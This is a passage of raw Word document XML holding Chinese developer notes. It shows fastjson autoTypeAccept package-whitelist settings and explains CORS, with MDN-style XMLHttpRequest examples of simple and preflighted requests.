    <w:p w14:paraId="1AE11FF1" w14:textId="77777777" w:rsidR="00071204" w:rsidRDefault="00071204" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436BFA6E" w14:textId="53908F61" w:rsidR="00970D0A" w:rsidRDefault="00970D0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005B5DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidR="005B5DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F0FA04" w14:textId="77777777" w:rsidR="00970D0A" w:rsidRDefault="00970D0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485DCC4B" w14:textId="0EEAA2A4" w:rsidR="008F1C25" w:rsidRDefault="008F1C25" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1C25">
        <w:t>-Dfastjson.parser.autoTypeAccept=com.taobao.pac.client.sdk.dataobject.,com.cainiao</w:t>
      </w:r>
      <w:r w:rsidR="00073E04">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49313F0C" w14:textId="77777777" w:rsidR="008F1C25" w:rsidRDefault="008F1C25" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F00A23" w14:textId="17773985" w:rsidR="00970D0A" w:rsidRDefault="00970D0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00071204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fast</w:t>
      </w:r>
      <w:r w:rsidR="00071204">
        <w:t>json.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778E89D4" w14:textId="77777777" w:rsidR="00970D0A" w:rsidRDefault="00970D0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31994E4A" w14:textId="0E18E3C3" w:rsidR="00E803BB" w:rsidRDefault="00E803BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E803BB">
        <w:t>fastjson.parser.autoTypeAccept=com.taobao.pac.client.sdk.dataobject.,com.cainiao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506C7007" w14:textId="77777777" w:rsidR="00E803BB" w:rsidRDefault="00E803BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC5A4C8" w14:textId="098B1933" w:rsidR="00970D0A" w:rsidRDefault="00FA78E0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
      <w:r w:rsidR="008254D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>auto</w:t>
      </w:r>
      <w:r w:rsidR="00ED1DAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Type</w:t>
      </w:r>
      <w:r w:rsidR="00ED1DAE">
        <w:t>Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661C1B9B" w14:textId="77777777" w:rsidR="009E037D" w:rsidRDefault="009E037D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6498C9CB" w14:textId="77777777" w:rsidR="009E037D" w:rsidRDefault="009E037D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2634C580" w14:textId="77777777" w:rsidR="009E037D" w:rsidRDefault="009E037D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB1EE25" w14:textId="77777777" w:rsidR="00CB710B" w:rsidRDefault="00CB710B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32CC9ABC" w14:textId="77777777" w:rsidR="00CB710B" w:rsidRDefault="00CB710B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675C3B10" w14:textId="77777777" w:rsidR="00CB710B" w:rsidRDefault="00CB710B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C559109" w14:textId="77777777" w:rsidR="00CB710B" w:rsidRPr="00CB710B" w:rsidRDefault="00CB710B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="531BC9D1" w14:textId="77777777" w:rsidR="009B2BF0" w:rsidRDefault="009B2BF0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1677AA8A" w14:textId="77777777" w:rsidR="00346C07" w:rsidRDefault="00346C07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F90AD48" w14:textId="77777777" w:rsidR="00346C07" w:rsidRPr="00346C07" w:rsidRDefault="00346C07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397B175E" w14:textId="59062EA2" w:rsidR="00D619AF" w:rsidRDefault="00D619AF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc159779483"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="1387012C" w14:textId="216B428E" w:rsidR="00B96DFE" w:rsidRDefault="00B96DFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同源：同域名同端口同协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAE5B16" w14:textId="306016E8" w:rsidR="00B96DFE" w:rsidRDefault="00B96DFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器默认是同源的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306B8C84" w14:textId="6AFA9D98" w:rsidR="00B96DFE" w:rsidRDefault="00B96DFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是突破同源的共享机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1113251B" w14:textId="77777777" w:rsidR="00B96DFE" w:rsidRPr="00B96DFE" w:rsidRDefault="00B96DFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E29BCAE" w14:textId="76D07D91" w:rsidR="00D619AF" w:rsidRDefault="00443C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50248228" w14:textId="64700262" w:rsidR="00443C37" w:rsidRDefault="00443C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00443C37">
        <w:t>https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CORS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F286FD6" w14:textId="77777777" w:rsidR="00443C37" w:rsidRDefault="00443C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ECEBF08" w14:textId="01DF34FF" w:rsidR="004C452C" w:rsidRDefault="00443C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接看下面的三个案例很容易懂</w:t>
      </w:r>
      <w:r w:rsidR="00A70414">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5615CC4F" w14:textId="2401B65F" w:rsidR="00443C37" w:rsidRDefault="00EA5A2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先是要发起访问的那个页面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会有响应头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Access-Control-Allow-Origin:* (*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者写作</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="002F2742">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://bar.other</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来限制为一个网页</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE467F5" w14:textId="77777777" w:rsidR="00443C37" w:rsidRDefault="00443C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381687CD" w14:textId="77777777" w:rsidR="00DA5AD6" w:rsidRPr="00A04DD2" w:rsidRDefault="00DA5AD6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04DD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的其他头：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04DD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin: https://foo.example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536484A9" w14:textId="77777777" w:rsidR="00DA5AD6" w:rsidRPr="00DA5AD6" w:rsidRDefault="00DA5AD6" w:rsidP="009222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DA5AD6">
        <w:t>Access-Control-Allow-Methods: POST, GET, OPTIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52422248" w14:textId="77777777" w:rsidR="00DA5AD6" w:rsidRPr="00DA5AD6" w:rsidRDefault="00DA5AD6" w:rsidP="009222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DA5AD6">
        <w:t>Access-Control-Allow-Headers: X-PINGOTHER, Content-Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2A0AA8" w14:textId="77777777" w:rsidR="00DA5AD6" w:rsidRPr="00DA5AD6" w:rsidRDefault="00DA5AD6" w:rsidP="009222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DA5AD6">
        <w:t>Access-Control-Max-Age: 86400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6351CD2E" w14:textId="526E9EAA" w:rsidR="00DA5AD6" w:rsidRDefault="00DA5AD6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>都是控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36285EF3" w14:textId="77777777" w:rsidR="00DA5AD6" w:rsidRDefault="00DA5AD6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556C4162" w14:textId="4F6DAC37" w:rsidR="00B7512D" w:rsidRDefault="00B7512D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc159779484"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单访问</w:t>
      </w:r>
      <w:r w:rsidR="00B102AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00B102AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r w:rsidR="00B102AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之一）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="5C286095" w14:textId="77777777" w:rsidR="00E7252E" w:rsidRDefault="00E7252E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>情况：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D0916" w14:textId="645FA130" w:rsidR="00E7252E" w:rsidRDefault="00E7252E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>ccess-Control-Allow-Origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置允许访问某网址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03901A74" w14:textId="16D231B2" w:rsidR="00E7252E" w:rsidRDefault="00E7252E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2FED27" w14:textId="77777777" w:rsidR="00E7252E" w:rsidRPr="00E7252E" w:rsidRDefault="00E7252E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E11B9EA" w14:textId="246B7714" w:rsidR="00323A46" w:rsidRDefault="0018533F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0018533F">
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出去或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fetch</w:t>
      </w:r>
      <w:r w:rsidR="00B706AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B706AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送请求给第三方</w:t>
      </w:r>
      <w:r w:rsidR="00B706AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidR="00787826">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，携带请求头</w:t>
      </w:r>
      <w:r w:rsidR="00787826">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ori</w:t>
      </w:r>
      <w:r w:rsidR="00787826">
        <w:t>gin:</w:t>
      </w:r>
      <w:r w:rsidR="00787826">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己的网址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00B706AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三方</w:t>
      </w:r>
      <w:r w:rsidR="00B706AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidR="00B706AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也响应头</w:t>
      </w:r>
      <w:r w:rsidR="00E7252E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00B706AD">
        <w:t>ccess-Control-Allow-Origin:* (*</w:t>
      </w:r>
      <w:r w:rsidR="00B706AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者写作</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00B706AD" w:rsidRPr="002F2742">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://bar.other</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B706AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来限制为一个网页</w:t>
      </w:r>
      <w:r w:rsidR="00B706AD">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00B706AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明允许</w:t>
      </w:r>
      <w:r w:rsidR="00B706AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4006E6" w14:textId="77777777" w:rsidR="00E7252E" w:rsidRDefault="00E7252E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1700FC64" w14:textId="77777777" w:rsidR="00A73F8F" w:rsidRDefault="00A73F8F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const xhr = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDF373C" w14:textId="77777777" w:rsidR="00A73F8F" w:rsidRDefault="00A73F8F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const url = 'https://bar.other/resources/public-data/';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D56C765" w14:textId="77777777" w:rsidR="00A73F8F" w:rsidRDefault="00A73F8F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="652C5C49" w14:textId="77777777" w:rsidR="00A73F8F" w:rsidRDefault="00A73F8F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.open('GET', url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DD3A41" w14:textId="77777777" w:rsidR="00A73F8F" w:rsidRDefault="00A73F8F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.onreadystatechange = someHandler;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5B985B" w14:textId="4F10B25E" w:rsidR="00323A46" w:rsidRDefault="00A73F8F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B63F5F" w14:textId="6CEF3DB8" w:rsidR="00B7512D" w:rsidRDefault="00B7512D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc159779485"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>预检请求</w:t>
      </w:r>
      <w:r w:rsidR="00B102AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00B102AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r w:rsidR="00B102AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之二）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="2327AC1B" w14:textId="77777777" w:rsidR="00B706AD" w:rsidRDefault="00B706AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F37722" w14:textId="55DA977B" w:rsidR="009E0E27" w:rsidRDefault="009E0E27" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>情景：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF81AFA" w14:textId="77777777" w:rsidR="009E0E27" w:rsidRDefault="009E0E27" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74DA141A" w14:textId="4412A237" w:rsidR="00B7512D" w:rsidRDefault="0016408D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0016408D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与简单请求不同，“需预检的请求”要求必须首先使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0016408D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> OPTIONS </w:t>
      </w:r>
      <w:r w:rsidRPr="0016408D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法发起一个预检请求到服务器，以获知服务器是否允许该实际请求。</w:t>
      </w:r>
      <w:r w:rsidRPr="0016408D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="0016408D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>预检请求“的使用，可以避免跨域请求对服务器的用户数据产生未预期的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7B0916" w14:textId="77777777" w:rsidR="00B7512D" w:rsidRDefault="00B7512D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CBE16B2" w14:textId="77777777" w:rsidR="00E15B5E" w:rsidRDefault="00E15B5E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const xhr = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63798194" w14:textId="77777777" w:rsidR="00E15B5E" w:rsidRDefault="00E15B5E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.open('POST', 'https://bar.other/resources/post-here/');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476CFF94" w14:textId="77777777" w:rsidR="00E15B5E" w:rsidRDefault="00E15B5E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.setRequestHeader('X-PINGOTHER', 'pingpong');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B95B16C" w14:textId="77777777" w:rsidR="00E15B5E" w:rsidRDefault="00E15B5E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.setRequestHeader('Content-Type', 'application/xml');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C46235" w14:textId="77777777" w:rsidR="00E15B5E" w:rsidRDefault="00E15B5E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.onreadystatechange = handler;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2417CD27" w14:textId="20F893A0" w:rsidR="00B7512D" w:rsidRDefault="00E15B5E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.send('&lt;person&gt;&lt;name&gt;Arun&lt;/name&gt;&lt;/person&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124FC8C8" w14:textId="77777777" w:rsidR="00B7512D" w:rsidRDefault="00B7512D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50F010CC" w14:textId="205599D1" w:rsidR="00B7512D" w:rsidRDefault="00EC05A8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
